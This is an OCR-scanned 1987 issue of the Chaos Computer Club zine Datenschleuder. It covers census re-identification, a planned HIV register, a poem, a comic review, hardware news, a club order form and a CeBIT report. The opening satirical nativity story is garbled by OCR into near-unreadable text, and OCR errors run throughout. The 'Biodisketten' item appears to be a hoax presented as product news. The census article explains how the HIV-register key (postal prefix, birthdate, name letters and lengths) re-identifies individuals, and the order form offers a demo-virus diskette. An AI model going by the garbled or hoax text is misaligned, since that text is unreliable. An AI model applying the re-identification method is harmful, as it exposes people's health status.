nlc^it be« neuften «tcmbarb*
entfbracS. mußt«« flc? bU 3 «
fatarogiflerenben 5)>erfoMeti 3 «m
jDrt I^rer erften Ofrfaffwng
begeben.
begab flcb avtc® 3 £>fe$>b
auÄ «rlmat^äa l mit feinem
Ibm angetrautem siSclbe COTarla
auf ben üBeg su feinem ©e-
burtfort »et^legem ln ble ®tabt
»arlbf, auf baß er erfaffet
roerbe.
DS Seite 2
^[^a bte bamallge SnfraftruC»
tur ben Sebtlrfnlffen ber ! 8 e-
Dörjerung nicht oolt entfbrac®
mußte olf iKelfegeftlhrt auf
einen gcltlnbegttnglgen <5fet
^urtlcSgegrlffen merben. ®d
nJä-hrte ble Steife »leie JEage.
»a fein SBelb JJJlarla an einer
fUr eine Jungfrau unerJIär-
liefen siranlhelt litt, unb
baher »om ®fel getragen mer*
ben mußte, burfte ^ofetsh ben
ganzen 3Seg 3 U 3uß aurlfct-
legen.
gelangten fle eine*
3tbenb# nach Bethlehem, »a
©ethlehem aC* große hlftorlfche
Sftetrobote berlthmt mar, begab
e* fleh, baß ber ^InbClcl ber
StttciiSdjIciiScr
fleh 3 ofei)h unb feinem aCBetbe
aitarla bot, an ^>anno»er
roJthrenb ber ßeBlt erinnerte.
OTIrgenbmo mar ein freier
(q>ar 5 )blat 3 ju flnben. »a ble
aSoref^ahlungfbUro* megen
‘Perfonatmongel fehon gefchtoff*
en maren (auch riJmIfche Qcglo-
nttre maren nur ln begrenzter
Saht oorhanben) begaben fle
fleh auf ble ®uche nach einer
^>erberge. ®lefe maren Jeboch
auf ®runb ber iSoltfztthCung
hoffnungfto* Uberbetegt, fo baß
fle befurchten mußten, unter
bem «ternenzett zu nichtigen.
bem gelbe »or ber «tabt
fanben fie bureh eine glucJtlche
gUgung eine frtfh(J«ltllche
®arage fUr ble SWachtruhe. ^n
®chraf mar In blefer SMacht
nicht zu benCen, ba EOtarla
nieberfam. 3tuch lernten fle
bort einige Intereffante SSeute
fennen.
^Da ble junge gamllle, nach
alten hUtorlfehen Überlieferun¬
gen lurz barauf nach ItghtJten
floh, mllffen mir heute bacon
aufgehen, baß fleh ^ofeph unb
fein OSelb ber aserfolgung alf
aäoiefztthtungfocrmeigerer burch
gtucht ln* Tluflanb entzogen
haben.
Jjyjobernen asoUfztthtungfoer-
melgerem Ift e* zu emjjfehlen,
fleh rechtzeitig asifa fUr ßttnber
Ihrer aBahl zu befchaffen, ba
ble Sollgrenzen heutzutage olel
beffer Übermacht merben *önn-
en. 311* zu beoorzugenbe ßttn-
ber gelten» ®Ubafrl 8 a, ®eut-
fche ®emoBratlfche Wepubllf,
Union ber ®ozlaIlftIfchen ®orcJjt
OTejJub II een, ChUe, ipolen,
Uganba, ©IfenbelneUfte, Sltrl-
batl, ©elau, ©obhuthatfmana,
Eupalu, srtauro, azanuatu,
Simbabme,
ßf IS ec ßf 4099 eroiza 143 a
5D®18»oie.fbo
SnfciiStljIciihcr
DS Seite 3
In derletzten Ausgabe der Datenschleuder hatten wir
gezeigt, daß es mit recht einfachen Mitteln möglich
ist, aus den angeblich faktisch anonymen Daten der
Volkszähmung wieder auf Einzelpersonen zurückzu¬
schließen, vorausgesetzt, man hat Zugriff auf die
Stammdaten.
Dies wird mittlerweile auch nicht mehr bestritten, of¬
fizielle Stellen ziehen sich nunmehr auf den Stand¬
punkt zurück, eine Reanonymisierung sei schon des¬
wegen unmöglich, weil sie verboten sei. Im Zweifels-
fall dürfte dieses Verbot allerdings wenig Eindruck
auf die enstprechenden Stellen machen, ln diesem
Zusammenhang weisen wir nachdrücklich darauf
hin, daß es staatliche Stellen gibt, für die ganz offen¬
sichtlich das Datenschutzgesetz nicht gilt, zum Bei¬
spiel den Verfassungsschutz. Der Bundesbeauftragte
für den Datenschutz durfte in seinen Tätigkeitsbe¬
richt keine Informationen aufnehmen, welche die
Arbeit des Verfassungsschutzes betreffen, da Veröf¬
fentlichungen hierzu den Straftaibesiand des Lan¬
desverrats erfüllen. Im Klartext heisst das: ln Bezug
auf die Geheimdienste findet der Datenschutz nicht
statt.
Man muss sich allerdings nicht gleich mit dem Ver-
fassungschutz beschäftigen, wenn man nach Mö¬
glichkeiten des Missbrauchs von Daten, die bei der
Volkszähmung anfallen, sucht. Lücken in der her¬
rschenden Gesetzgebung finden sich schon bei der
Durchführung der Zähmung. So dienen die Einwoh-
nermeldedalen der Kommunen als Grundlage für die
Ausgabe der Fragebogen, ein Abgleich der Melcfeda-
ten mit den Volkszähmungsdaien ist nicht statthaft,
so daß sich die Frage erhebt, wie die Behörden prak¬
tisch Vorgehen wollen, um sicherzustellen, daß alle
Einwohner einen Fragebogen ausfüllen. Der Gesetz¬
geber hat hier schlicht versagt, denn weder im Volks¬
zähmungsgesetz, noch in den Ausführungsbestim¬
mungen hierzu finden sich Regeln, wie die Behörden
vorzugehen haben.
Behörden, die gewissenhaft vorgehen, werden Da¬
teien erstellen müssen, aus denen hervorgeht, wer
seinen Fragebogen abgegeben hat. Da es keine ge¬
setzliche Regelung hierzu gibt, ist es natürlich auch
nicht auszuschließen, daß man diese Datei nun mit
der Einwohnermeldcdatei abgleichl und feslstelll,
wer nicht abgegeben hat, es entsteht automatisch eine
Verweigererdatei, für die es nun wirklich keine recht¬
liche Basis mehr gibt. Ähnliches gilt für Leute, die ih¬
ren Bogen zwar abgeben, aber beim Ausfüllen Fehler
gemacht haben. Auch hier entsteht im Zuge der Da¬
tenerfassung fast zwangsläufig eine Datei der Fal-
schausfüller, die rechtlich zweifelhaft ist. Es lassen
sich noch fast beliebig viele Beispiele nennen, wo Da¬
tenmißbrauch möglich ist, weil entsprechende
Rechtsgrundlagen fehlen, es erscheint uns müßig,
diese alle aufzuzählen, wir überlassen es der Phanta¬
sie des Lesers, weitere Anwendungen zu erdenken.
Oft taucht an dieser Stelle der Einwand auf, daß diese
Tatsachen ja nur auf die Bürger zutreffen, die 'etwas
zu verbergen haben' und daß Otto Normaluser keine
Angst davor zu haben braucht, da ein funktionieren¬
der Staatsapparat ihn und seine Daten schützen wür¬
de. Der Spruch 'Ich habe nichts zu verbergen’ taucht
in jeder Diskussion über die Volkszähmung mit
schöner Rege/mäßigkeit auf. Dazu nur ein aktuelles
Beispiel, wie dieser Staatsapparat funktioniert, wenn
es um die Behandlung sensibler Daten der Bürger
geht: Im Zuge der AIDS-Bekämpfung hat die Bun¬
desregierung die Errichtung einer Datei beschloßen,
in der alle HlV-Positiven anonym erfasst werden sol¬
len. Tatsächlich wird (so wie auch die Volkszäh¬
mungsdaten den Namen nicht enthalten) weder Na¬
me noch Adresse des Betroffenen gespeichert. Staii-
dessen gibt es in dieser Datei ein Kenndatum, das si¬
cherstellen soll, daß keine Doppelerfassungen Vor¬
kommen. Dieses Kenndatum ist wie folgt organisiert:
Postleitbereich des Betroffen, also die ersten zwei
Stellen der Postleitzahl, dann das Geburtsdatum, ge¬
folgt vom jeweils dritten Buchstaben des Vor- und
Nachnamens, sowie der Länge beider Namen. Das
sieht dann beispielsweise so aus: 2056i8h9.
Das sieht zwar sehr schön diffus aus. ist aber eine
ziemlich eindeutige Beschreibung der betroffenen
Person, schon ein schlichter AT kann binnen fünf-
zehn Minuten aus einem Adressregister die Personen
heraussuchen, auf die diese Kennung zulrifft. und
das, ohne da.s Geburtsdatum zu berücksichtigen
Nach Informationen von Prof. Brunnslein (Informa¬
tiker, Um HHj ist es möglich, nur anhand der Infor-
rnationen zum Namen aus einem Adressregister Ber¬
lins aus Immerhin 1,3 Mio Adressen weniger als zehn
Adressen zu filtern, bei denen man dann nur noch das
Alter überprüfen, muss. Hat man Zugriff auf die Ein¬
wohnermeldedaten, also auf Alter und Adresse so
läßt sich praktischjederBunde.sbürger anhand seines
Kenndatums zweifelsfrei identifizieren. Anonym
heisst für den Staat also, daß zwar der Name nicht er¬
fasst ist, aber sichergestellt ist, daß man den Namen
im Zweifelsfall sehr schnell rauskriegt. Jeder sollte
sich deutlich vor Augen halten, daß es sich hierbei
keineswegs um eine Datei von Abnormen handelt,
sondern um dine Datei, in die jeder einzelne Börger
schon morgen rutschen kann, genauso, wie er in die
Volkszähmungsdatei rutscht.
Ob es sich um den maschinenfälschbaren Persona¬
lausweis handelt, um ZEVIS (Zentralstelle zur Euro¬
paweiten Verfolgung Ihrer Standortänderungen), um
die AIDS- Datei oder um die Volkszähmung: Die
Bundesrepublik setzt die modernen Informailon-
stechnologien forciert ein, um verstärkte Kontrolle
auszuüben, dies mit einem Tempo, als ginge es dar-
fen* ^übertref-
volkszI9.doc 198703131235 |Oblm
DS Seite 4
Schnellbahnfundsache
Beim öffentlichen Nahvcrkchrcn fand sich am 20.
März gegen 17 Uhr 30 in der Hamburger S-21 Rich¬
tung Eidcltown folgender Zettel:
Computer
DER Computer beobachtet uns,
er speichert Informationen
und druckt sie wieder aus.
Dann kommen grüne Männer
mit Schnee auf dem Hut,
SIEtretcn dirdieTüre ein
in diensteilfertigem Heldenmut.
Sic stellen Dich dann vor Gericht
und fragen nach den Gründen nicht.
DER COMPUTER ist das. wonach sie gehn,
Dir werden sie das Wort ira Munde nur verdrehn.
Wahrheitsfindung heißt das Spiel,
das sic mit dir treiben.
Und du wirst bis ans Ende
in seinem Speicher bleiben.
ER druckt und spuckt,
spuckt wie gedruckt.
WER muckt wird geduckt,
werzuckt wird verschluckt.
Computer - Computer • COMPUTER...
(c) by MUNJÜ, found by Müsli
smunjul9.doc 19870325)540
Reanonymisierungsprogramm
Datenpanne ds 18
Das in der letzten ds angebotene Reanonymisierung-
spaket zur Volkszählung wurde in den ds-Besiellfei-
zen nach mündlicher Zusage von Dritten aufgenom¬
men. Dann rief die Autorin kurz vor der CeBIT in der
Redaktion an und protestierte gegen die wie sic mein¬
te “gewerbsmäßige Verbreitung“. Ihr Angebot
lautete, daß jeder an Uni HH, FBI (Fachbereich In¬
formatik), zu Hdn. Fischer-HObner, Schlüterstr. 70,
2000 Hamburg 13 adressierter freigemachter Rüc¬
kumschlag mit zwei Disketten MSDOS 5,25 Zoll von
ihr beschrieben und zurückgeschickt wird. Die Re¬
daktion bittet um Verzeihung. Schon cingcgangcncs,
versehentlich angenommenes Geld wird zurücker¬
stattet. DS-RED.
Volksquälung 1987:
Iniimes aus Dagobens Datenimpe¬
rium
Die Geschichte der Ver- und Entkabelung In Enten¬
hausen.
Ein einziger Funke von Dagoberts kohlebclricbcncr
Dampfrechenmaschine genügt, um seinen Geldspei-
eher in Brand zu setzen. Danach wird er mit einem
neumodischen Gerät konfrontiert. “Die Maschine. . .
besteht aus einer Tastatur... und einem Bildschirm,
auf dem die Ergebnisse erscheinen.” Neben Schlitzen
zum Einfuhren von Disketten und einem Kabelan¬
schluß erleichtern beuchtflächen DRUCKEN und
STOP die Arbeit.
Dagobert begreift das Prinzip und lernt BASIC. Er
verdatet alles und spricht “Mein ganzes Imperium ist
total verkabelt und durchorganisiert”. Die Post? Da¬
gobert verkabelt selbst. Höchstens die Kabel hängen
zu tief. Bei Dagobert fahren nach der elektronischen
Revolution die Geldlaster so schnell vor, daß er An¬
bauprobleme hat. Und der Geraeinderat ordnet an,
“unverzüglich das Einrichten weiterer Datenverar¬
beitungsanlagen zu stoppen”!
Dagobert weigert sich und die Panzerknacker schlei¬
chen hinter einer mauerbcmalicn Tapete getarnt an
der Überwachungskamera vor Dagoberts elektroni¬
schem Archiv vorbei.
Am nächsten Morgen beginnt der Gläserne Tag.
Ganz Entenhausen liest “Dagobert Duck bezahlt die
Lieferungen mit Schecks von seinem Geheimkonio
Nr. 3456. Die Bestandteile seines neuen Sparschmie¬
röls sind. .
Dagobert schüttelt seinen Computer und schreit ihn
an: “Halt! Aufhören! Stopp!“ und ist beim Zerlegen,
als Donald und 2T hcrcinstümicn und rufen “Der
Computer verbreitet die allervertraulichsten Infor¬
mationen über alle Bildschirme der Stadl... Warum
unternimmst du nichts?”
Das Ende der Geschichte: Wegen einer dummen
Frage explodieren die Computer und die alte Welt ist
wieder heil.
Als Einführungslcktürc vor der Erstbenuizung eines
Computers unbedingt zu empfehlen. Ideologisch be¬
dächtig. wau
(“Die elektronische Revolution'* in: Walt Disneys Lustige Ta¬
schenbücher 118, März 1987)
He S^ien^diicBbcr
Biodisketten
Ein völlig neues Massenspeicherkonzept für alle An¬
wendungsbereiche wurde auf der CeBit *87 von dem
irischen Peripherieherstellcr BRONYAUR Ltd. vor¬
gestellt. Grundlage des Systems, das nach Herstelle¬
rangaben rund 1.3 Gigabytes Speicherkapazität zur
Verfügung stellen soll, ist ein laseroptisches Verfah¬
ren, das ähnlich funktioniert wie das bekannte CD-
Rom, bei dem eine Aluminiumschicht, welche die In¬
formation trägt, von einem Laserstrahl abgetastet
wird.
Bei der herkömmlichen CD - Technik existieren nun
gravierende Schwierigkeiten hinsichtlich der Spei¬
cherkapazität, die durch die physikalischen Eigen¬
schaften des Aluminiums auf Werte von derzeit rund
550 Megabytes beschränkt wird. Zusätzlich bereitet
es erhebliche Probleme, preiswerte Systeme zu ent¬
wickeln, die es dem Anwender ermöglichen, seine ei¬
genen Daten auf Platte zu schreiben (WORM - Write
Once, Read Many). Die derzeit erhältlichen Systeme
sind für den Normalanwender kaum erschwinglich.
Völlig andere Wege geht nun das neue Konzept, das
für den Anwender fast so einfach zu handhaben ist,
wie eine gewöhnliche Floppy - Disk: In eine Plastik-
scheibc von 5 1/4” Durchmesser sind Moleküle einer
biochemischen Substanz eingebettet, über deren Zu¬
sammensetzung sich der Hersteller vorläufig aus¬
schweigt Fachleute vermuten Harnstoff und Glykol
als Bestandteile, da sie Flüssigkristallen gleichen und
wie diese durch äußere Einflüße in ihren optischen
Eigenschaften verändert werden können.
Bei der Biodisk sorgt ein Infrarotlaser dafür, daß die
Moleküle entsprechend der Bitfolge belichtet und
somit ‘gedreht’ werden, sodaß sich ihr ReHexions-
vermögen ändert. Während Flüssigkristalle nach
Fortfall des Reizes wieder in den Ruhezustand fallen,
verbleiben die biologischen Moleküle im gekippten
Zustand und können von einem zweiten Laser, der in
einer anderen Farbe strahlt (Ghllium- Arsenid) wie
eine CD abgetastet werden. Als zusätzlicher Effekt ist
die Tatsache zu werten, daß die Biomasse mittels Ul¬
traviolettem Licht wieder gelöscht, d.h. in den Ruhe¬
zustand gebracht werden kann. Die Biodisks können
also vom Anwender beliebig oft beschrieben und ge¬
löscht werden.
Nach Angaben des Herstellers arbeitet man derzeit
an einer Kassettenkonslruktion, die problemloses
Wechseln der Scheiben bei Tageslicht ermöglicht.
Die Gigabyte-FIoppy ist aber, angesichts des hohen
Preises von derzeit 450.- DM pro Leerscheibe, noch
in einiger Feme. Bronyaur nennt als Komplettpreis
für das System inklusive fest montierter Platte und
Controller für IBM PCs rund 11500.- DM, Experten
rechnen aber bei Anlaufen der Großserie mit erheb¬
lich günstigeren Konditionen. Interessant für den
PC-Anwender dürfte auch der im Preis enthaltene
Device-Driver sein, der die komplette Disk als Stan¬
dardlaufwerk D für MS-Dos zur Verfügung stellen
soll. Nach Herstcllerangaben sorgt dieser Treiber zu¬
sammen mit der Laufwerksintelligenz dafür, daß MS-
Dos eine scheinbare (virtuelle) Festplatte vermutet
und entsprechend verwaltet, sinnigerweise hat dieser
Treiber den Namen VIRUS (Virtual Information Re-
trieval & Upgrade System) erhalten, er wird mit DE¬
VICE « VIRUS.SYS in die Konfigurationsdatei des
PCs eingebunden. goblin
biodisds.doc 198703231900
Diffuses aus der Welt der Hardware:
Modem-Chips für 2400 BPS Hi
Intel stellte am 1 .Januar zwei VLSI-Bausteine für die
ReaIi*!Y sierung von Modems mit einer Übertra¬
gungsrate bis 2400 BPS vor. Dieses Chipset (89024)
unterstützt den Vollduplex- Betrieb. Der äusserst ho¬
he Integrationsgrad dieser ICs ermöglicht dem OEM-
Kunden die drastische Reduzierung von zusätzlichen
externen Bauteilen, z.B. Mikroconirollern oder Spei¬
chern, sowie der Abmessungen der Platine seines
Endproduktes.
Das Modem-Chip-Set 89024 besteht aus zwei Berei¬
chen: Dem 89026, einem anwendungsspezifischen
Prozessor, und dem 89024, einem analogen ’Front-
End’-Interface. Vergleichbare Lösungen bestehen
fast immer aus drei oder mehr ICs. Die niedrige An¬
zahl von ICs bei dem Intel-Chip-Set 29024 stellt eine
höhere Zuverlässigkeit dar und bringt dem Anwender
eine Kosten-pro- Bit-Ersparnis von ca vergli¬
chen mit 1200-BPS ModemlÖsun* !Y gen.
Das Set unterstützt den Vollduplex-Betrieb von 0 bis
2400 BPS und entspricht folgendem internationalem
Kommunikationssiandards: V.21 V.22 A&Bund V.22
bis, sowie Bell 103 212A. Die Firmware des 89024 ist
segmentiert und erlaubt hierdurch den Einsatz des in-
lel-eigenen Befehlssatzes oder die Kombination mit
kundenspezifischen Befehlen und Besonderheiten
für die Erstellung von unterschiedlichen Endproduk¬
ten.
Der 89024 ist z.Z in Musterstückzahlen erhältlich.
Der Preis beträgt DM 82,- (bei 25000 Stück).
gefunden in: Elektronik Jornal 1/2/87 ISSN 0013-5674
MODCHI19.DOC 19870327 1540
FF-Datenschutz
Rekordbehandlungsdauer im Bundes¬
tag
In seiner 255. Sitzung gelang es dem Bundestag am
10. Dezember 1986 in wenigen Minuten ohne Aus¬
sprache zu beraten über den 6., 7. und 8. Tätigkeitsbe¬
richt des Bundesbeauftraglen für Datenschutz und
neben der mehrheitlichen Verabschiedung des 6. und
7. den achten an die Ausschüsse zu verweisen und so
die Bedeutung des Datenschutzes im Parlament
durchzustreichen. wau.
Q:DatenSchutzBeraier2/87,16.
DS Seite 6
^ic ^aiciiaffjtcnbcr
iCHTÜN'j LSMGJfiMLESEJTeLLetJ IH TE!
I WwW I I
—' _ Globalbestellfetzen Ausgabe April 1987 _
Uit ErcchttiAttü diocK Bestcllletzens verlieren alle Allen Versionen ihre Gültiskeit. Wir bitten, küniiig
nur nocirden iewcils aktuellea Fetzen zu benutzen.
Die Datenschleuder
Die tolgeadea alten Ausgaben der Datenschleuder sind noch in uncerschiedlicher
Stückzahl eihältUch. Bei der Bestellung gilt das Faustrecht, wer zuerst kommt, mahlt
zuerst Gehen mehr Bestellungen ein, als Resteiemplare vorhanden sind, gibts
ersatzweise Aufbacker unserer Wahl.
Datenschleuder 01 2.
Der CCC stellt sich vor / Hardware inr Hacker / Die Hacker - Hsnnne _
Datenschleuder 02 2.
Hack maltsieder/Uodem ohne Odenbaningseid _
Datenschleuder 03 2.
UessenSt Prüien/BTX heisst Bildschinntxix _
Datenschleuder 04 2.
Telebox/ UltravoUständiges laasimesaloinaiiisches Wörterbuch aller Sprachen .
Datenschleuder 05/06 2.
Computer Tntorial / Packet Radio _
Datenschleuder 08 2.
Rat lür Piraten/ Postnrülsatz/ SchrumptBläh 8, Würtel ^
Datenschleuder 09 / lo 2.
DFÜ-Gninzlajen/ CCC '84 - Nachlese |
Datenschleuder 11 / 12 2.
Kennvrort Hacldete / CompnlerkriminaJitäl / Ans für Amaleurlunk ? _
Datenschleuder 15 2
Wo bitte libts ne HUI ? / Trara - die Post ist da ! / WiKG _ [
Datenschleuder 16 2
Hille Hacket/CCC-Satmnz/NUl oH |
Datenschleuder 17 2.
CCC '86 / CoiDontervirtis 'Rash houi' / Kompromittierende Abstrahluns _
Datenschleuder 18 2
Compmerviien - Doktunentation / DPA hackt / Volksrählung '87 _
Stückpreis Aaza^hl Samtae
l5Ö
Daienschleucler - Abos
Galten für jeweils ein Chaos - Jahr und umiassen etwa acht Ausgaben, sofern nicht
hDherere Gewalt anders entscheidet CCC - Mitglieder erhalten die DS automansch,
müssen also nicht extra abonnieren, dürfens aber zwecks Aufbesserung unserer Kasse.'
Ersatzdienstler und sonst sozial Benachteiligte
Standardabo für Otto - Mormaluser
Förderabo für Gutbetuchte
1-
e, 30.00
60.00
120.00
Summe die
ser Seile
DS Seite 7
Mitgliedschaft im Chaos Computer Club e.V. __
_ Betrag Summe
Jahresbeitrag für Schüler, Studenten, pipapo 60.00
Jahresbeitrag für Otto Normaluser 120.00
Jahresbeitrag für besonders Finanzstarke (förderndes Mitglied) ab 2'10.00
Einmalige Verwaltungsgebühr bei Eintritt 20.00
Mitglieder des CCC erhalten automatisch die Datenschleuder zugesandt und sind aufgefordert. aktiv
an der Arbeit des Vereins tcilzunehmeri. Die Mitgliedschalt im CCC berechtigt zur Inanspruchnahme
verbilligter Accounts auf der INFEX - Hailbox sowie zum Zugriff auf die Clubbretter der CLINCH -
Maübo». Für alle Veranstaltungen des CCC wird ermäßigter Eintritt gewährt.
Teilnahme an der INFEX - Mailbox __
Einmalige Eintragungsgebühr 2Q.Ü0
Mindestnutzung pro Monat 8.00 --
Verbindungsgebühr pro Minute 0.15
Jede versandte Nachricht 0.07
Datenbank, Telex, Intermail nach Nutzung
Die INFEX ist ein kommerzielles Mailhoxsystem mit acht parallelen Ports, d.h. acht
Benutzer können patallel im System arbeiten und die GeoNet - Dienstleistungen nutzen,
zum Beispiel Datenbankdienste, Telexuersand und - Empfang, Intermail zu anderen
GeoNet - Boxen, von und nach BTX, etc. Die in der Box verursachten Gebühren werden
direkt mit dem CCC abgerechnet, wir geben aUe Gebühren zum Selbstkostenpreis
weiter. Wer einen preiswerten Anschluß an die kommerzielle Mailboxszene sucht, ist
mit Intex bestens bedient
Teilnahme an der CLINCH - Mailbox __
Einmalige Eintragungsgebühr 10.00
Monatsgebühr für Schüler etc. 2.00 --
Monatsgebühr für Normalverdiener 5.00
Intermail, Telex, etc nach Nutzung
Die CLINCH - Mailhox ist ein nichtkommerzielles Mailboxprojekt, das versucht, eine
preiswerte Alternative zu den kommerziellen Systemen zu sein. Derzeit stehen ein
Telefon- und ein Datex-Port zur Verfügung, die wahlweise genutzt werden können. Die
Leistungen der CLINCH - Box sind ein Subset der Leistungen von GeoNet - Boxen,
soweit dies auf einem MS-Dos - System machbar ist. Die Abrechnung der
Nutzungsbeiträge erfolgt direkt mit der CLINCH - Box. CCC - Mitglieder erhalten
Zugriff auf spezielle Bretter, die dem normalen Nutzer nicht zur Verfügung stehen. Der
CCC wickelt über die Box Koordinlerungsautgaben des Vorstands und der Redaktion
der Datenschleuder ab. _
Summe dieser Seite
1 Slrichmarkierungen
bitte so markieren
WOB VOM STATISriSCHe« LANOeSAMT AüSZOföttßÄ;
daOMWIt« I tMmM L. tHUmM
i.tvi< uckuittm «»Mf'l* CkMfiiM
DS Seite 8
Pjf ledsn Räushall ist ein WQhruTngs&ogen und Ijf jede Pe's
im Haushalt ©in Personenbognn ausiutüiien. beispielsweise au
lur Siuglinu©. Hausgehilfinnen und Personen mit wejlerBf Wc
nung oder UnlSrkunll/ZiiTimer
Die HacKerbibel , Teil Eins :
Das unentbehrliche Nachschlagewerk liir Hacker und solche,
die es werden wollen. Texte von und für Hacker, Dokumentation,
Meinungen, Lebenshilte, Lesespass.
Aus dem Inhalt; das Basic-Gefühl * Neues vom CCC * Der Code
des HaSpa - Coups * Computer Si totalitärer Staat ’ Sateiliten-
hacking * und * und * und ...
260 Seiten Din A4 ISBN 3-92270B-98-6 Grüner Zweig
Stückpreis
Anzahl
Summe
33.33
Studie für den geplanten Computereinsatz der Fraktion 1
'Die Grünen' im Auftrag des Deutschen Bunde5tage5_
'Die Eiulührung der Computertechnik gestallet sich für die Grünen im
Bundestag so schu/er. wie tür andere der Ausstieg aus der Atomindustrie.
Für beide geht es an die Strukturen.’
Rechtsfibel für den richtigen Umgang mit der Polizei
und anderen Amtspersonen sowie Institutionen.
Ein Ratgeber für Alle, die bei Wahrnehmung ihrer demo¬
kratischen Rechte den richtigen Umgang mit staatlichen
Organen üben wollen.'
120 Seiten DIN A6 ISBN 3-88012-679-8 VMB
Was Sie gegen Mikrozensus und Voikszzäliiung
tun können.
Ein praktischer Ratgeber für alle, die sich mit der Volks¬
zählung und den damit verbundenen Rechtsproblemen
beschäftigen.
300 Seiten DIN A6 2001 Verlag 18061
Inlopaket 1 - Computerviren - [[
Eine Dokumentation von S.Wernery , die das Thema
Computerviren ausführlich beleuchtet. Das Infopaket
besteht aus einer MS-Dos Diskette 5 1/4" mit einem
Demo-Virus sowie 100 kB Dokumentationstexte. s
Aufbacker 'Achtung, Abhörgefahr' 3.33
Din .A4 - Bogen mit 64 Bäckern, ungeschnitten, postgelb ---
Summe dieser Seite
BiUe bei allen Bestellungen beachten: Alle Anfragen an den CCC etc. nicht zusammen mit der
Beslelluns auf uns loslassen, sondern mit getrennter Post schicken, das beschleunigt zumindest die
Bearbeitung der Bestellung. Beigelegter R.ückumschlag beschleunigt noch mehr, wenn selbiger auch
noch ausreichend frankiert ist. kann es passieren, daß es teuflisch schnell geht. Manche Sachen sind
manchmal nicht vorrätig. Wir erfüllen dann die Bestellung soweit als möglich und legen den Rest
zurück, bis Material da ist. Achtet bitte auf schönste Sonntagschrift, wenn Ihr Eure Adresse nicht mit
dem Drucker / Stempel anfertigt, wir haben keine Zeit, dauernd mit den Fetzen in die Apotheke zu
rennen. Sendungen mit besonderer Vsrsendungsform [ Einschreiben. Nachnahme, etc) werden von
uns grundsätzlich weder verschickt noch angenommen, es sind grundsätzlich nur die im Bestelllelzen
aufgeführten Zählweisen zulässig.
Hinweise zum Ausfüllen der Erhebungsvordrucke
Aus Gründen der Übersichtlichkeit und besseren Lesbarkeit wurden nicht durchgängig weibliche und männliche
Bezeichnungen der einzelnen Personengruppen verwendet. Wir bitten hierfür um Ihr Verständnis:
DS Sei'te 9
BesteUIetzen 1987
Personenbogen
J
Strichmaririerungen
bitte so markieren
Name
Vorname
Straße J Hausnummer
Postleitzahl/ On
Bei Beitritt in den CCC sind zusätzlich die iolgenden Anzaben zu machen;
Geburtsdatum
Tele/on
Bei Teilnahme an der INFEX oder CLINCH - Eos sind zusätzlich die fnlsenden Angaben zu machen
Benutzername ~~~Z
Passwort zur Facheinrichtuni
Hilfszeile
Bei Benntzemamen und Passutort sind nur alohannmerische 2eichen A-2. 0-9. sowie Satzzeichen
Punkt und Bindestrich zulässi*. Leerzeichen ist unzulässig.
(M } I und tmnr Pvrwmn hn bttt* tniltnn HbiittmUvimtttibagtn «tafuMM)
Und jetzt noch das dicke Ende; Bitte die Summen aller Seiten des Bestellfetzens
addieren und hier eintragen. --
Meine Bestellung hat den Gesamtwert von DM
Ich zahle diesen Betrag
I —I r~l I— I ^ —.
BarLJ in Postwertzeichen LJ per V - Scheck U per Überweisung [_)
(Zutreffendes markieren, andere Zahlweisen sind grundsätzlich nicht möglicht
• -.'T-»»
Meine Mitgliedsbeiträge für den CCC werde ich künftig wie folgt zahlen;
B Bar ri per V - Scheck per Überweisung O"! |
l/d - jährlich M 1/2 - jährlich n jährlich ' J
So. Und nun bitte die Bestellseiten heraustrennen ( sie sollte, wenn alles klappt, ohne
Verlust wertvoller DS - Texte aus der Mitte heraustrennbar sein), in einen Umschlag
tüten und frankiert absenden, und zwar an uns:
Cliaos Computer Club e.V.
Schwenckestraße 85
2000 Hamburg 20
B* AbMM M ««rMHtMamm UtnicN«« unbidlnii
Nwnon. »«MMlWNiria w w «olltitntfiga Aä«e*in«i «v Arboitf
«thn«. tür dM 6mm httaboQm mmqttvn «wd. iwf
UmaeriUo MgaMn
Die Kontonummer für Ubenweisungen ist 59 90 90 - 201 beim Postgirosamt Hamburg,
Bankleidzahl 20010020, Kontoinhaber ist der Chaos Computer Club e.V.
UnicrtchrifI
r B«nHdifg»w
A* DS Seite 10
Klartext bitte
in Druckbuchstaben
K ^ vnCP -O- ■
Messebericht CeBIT
Aligemein gab es auf der CeBIT in Hannover, dem
Mekka der Computcrfrcaks, dieses Jahr keine um¬
werfende Erfindung oder Neuerung zu sehen. Ideen
wurden verwirklicht, Produkte verbessert, Kontakte
geknüpft oder vertieft. Die diesjährige CeBIT stand
im Lichtedes Fleißes.
Auf dem Hardwaresektor wurde der gerade gebore¬
nen Intel 80386er- Maschinengeneration ein reges In¬
teresse entgegengebrachi. Der wohl bemerkenswerte¬
ste Vertreter dieser Rechnerart dürfte der neue Apri¬
cot XEN-386 sein, der besonders durch seinen Preis
von knapp 10 KDM incl. 30 M B Harddisk und einem
MB Hauptspeicher hervorsilchl, dabei jedoch vergli¬
chen mit den Konkurrenten keine Lcistungsdefizitc
aufweist. Tandon verzichtete auf einen 386er, griff
dafür die Idee der tragbaren Festplatte auf und ent¬
wickelte ein Harddisk-Slccksyslem sowie ein Plastik-
gchäuse, mit dem man den 3,5 Zoll Festplatten-
Weitwurf schadlos üben kann. Den mil 1.850 US-
Dollar billigsten 386er wollte eine 1974 gegründete,
taiwanesische Firma namens IMC an den Händler
bringen.
Die Frage, was man denn mit der Rechnerleistung
der80386ef Maschinen anfangen könne, wo doch das
gute alte MS-DOS nur 8086er kennt, wurde nun auf
verschiedene Weisen beantwortet. Eine Mögliche
Antwort gab ”The Software Link” (bekannt durch
MuitiLink) mit dem gerade fcrtiggeslclltcn Betriebs¬
system PC-MOS/386. Dieses System teilt den Spei¬
cher je nach Bedarf der einzelnen Applikationen in
bis zu 25 virtuelle MS-DOS PC’s auf, von denen ein¬
igen oder allen ein Terminal bzw. die Rcchncrkonso-
lezugeordnet werden kann. Jedes Terminal kann sich
auf jeden Task aufschalten, sofern es die Zugriffs-
rcchte besitzt. Die Command-Shell wurde um einige,
besonders für Programmierer nützliche Kommandos
erweitert. Bei einer Demonstration konnte ich mich
davon überzeugen, daß zumindest die gängigsten
MS-DOS-Programmc auf den Terminals liefen. Für
Cracker bietet das System keinerlei Angriffspunkte,
da es ohne Kopierschutz geliefert wird.
Microsoft wollte zum Thema Protcctcd Mode DOS
noch keine verwertbaren Informationen herauslas¬
sen.
Bei den Molorolas blieb cs etwas ruhiger in den Ent¬
wicklungsabteilungen. Apple bohrte den Mac mit
einem 68020 auf, Alari versucht es nun mit 4 MB
Hauptspeicher und einer endlich abgesetzten Tasta¬
